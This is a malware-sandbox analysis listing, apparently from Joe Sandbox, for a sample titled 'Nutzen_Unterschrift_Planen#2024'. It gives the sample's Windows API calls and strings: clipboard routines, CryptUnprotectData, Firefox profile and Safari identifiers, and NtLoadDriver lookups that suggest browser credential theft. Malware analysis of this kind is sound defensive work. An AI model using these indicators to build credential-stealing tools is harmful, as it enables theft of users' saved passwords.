                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                            • GetLastError.KERNEL32 ref: 00409974
                                                            • CloseClipboard.USER32 ref: 0040997D
                                                            Similarity
                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                            • String ID:
                                                            • API String ID: 3604893535-0
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00409882
                                                            • wcslen.MSVCRT ref: 0040988F
                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                            • CloseClipboard.USER32 ref: 004098D7
                                                            Similarity
                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                            • String ID:
                                                            • API String ID: 1213725291-0
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                            • free.MSVCRT ref: 00418370
                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75D4DF80,?,0041755F,?), ref: 00417452
                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                            Strings
                                                            Similarity
                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                            • String ID: OsError 0x%x (%u)
                                                            • API String ID: 2360000266-2664311388
                                                            APIs
                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            • OpenClipboard.USER32(?), ref: 00411878
                                                            • GetLastError.KERNEL32 ref: 0041188D
                                                            • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                              • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                              • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                              • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                              • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                              • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                            Similarity
                                                            • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                            • String ID:
                                                            • API String ID: 2633007058-0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            APIs
                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                            Similarity
                                                            • API ID: NtdllProc_Window
                                                            • String ID:
                                                            • API String ID: 4255912815-0
                                                            APIs
                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                            • memset.MSVCRT ref: 0040265F
                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                            • API String ID: 2929817778-1134094380
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                            • String ID: :stringdata$ftp://$http://$https://
                                                            • API String ID: 2787044678-1921111777
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                            • GetDC.USER32 ref: 004140E3
                                                            • wcslen.MSVCRT ref: 00414123
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                            • _snwprintf.MSVCRT ref: 00414244
                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                            • String ID: %s:$EDIT$STATIC
                                                            • API String ID: 2080319088-3046471546
                                                            APIs
                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                            • memset.MSVCRT ref: 00413292
                                                            • memset.MSVCRT ref: 004132B4
                                                            • memset.MSVCRT ref: 004132CD
                                                            • memset.MSVCRT ref: 004132E1
                                                            • memset.MSVCRT ref: 004132FB
                                                            • memset.MSVCRT ref: 00413310
                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                            • memset.MSVCRT ref: 004133C0
                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                            • wcscpy.MSVCRT ref: 0041341F
                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                            Strings
                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                            • {Unknown}, xrefs: 004132A6
                                                            Similarity
                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                            • String ID:
                                                            APIs
                                                            • memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            • wcscpy.MSVCRT ref: 004041D6
                                                            • wcscpy.MSVCRT ref: 004041E7
                                                            • memset.MSVCRT ref: 00404200
                                                            • memset.MSVCRT ref: 00404215
                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                            • wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 0040426E
                                                            • memset.MSVCRT ref: 004042CD
                                                            • memset.MSVCRT ref: 004042E2
                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                            • wcscpy.MSVCRT ref: 00404311
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                            APIs
                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                            • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf$memset$wcscpy
                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                            APIs
                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                            • String ID:
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                            • wcscpy.MSVCRT ref: 004448B4
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DBCD
                                                            • memset.MSVCRT ref: 0040DBE9
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                            • API String ID: 3330709923-517860148
                                                            APIs
                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                            • memset.MSVCRT ref: 0040806A
                                                            • memset.MSVCRT ref: 0040807F
                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                            • memset.MSVCRT ref: 004081E4
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
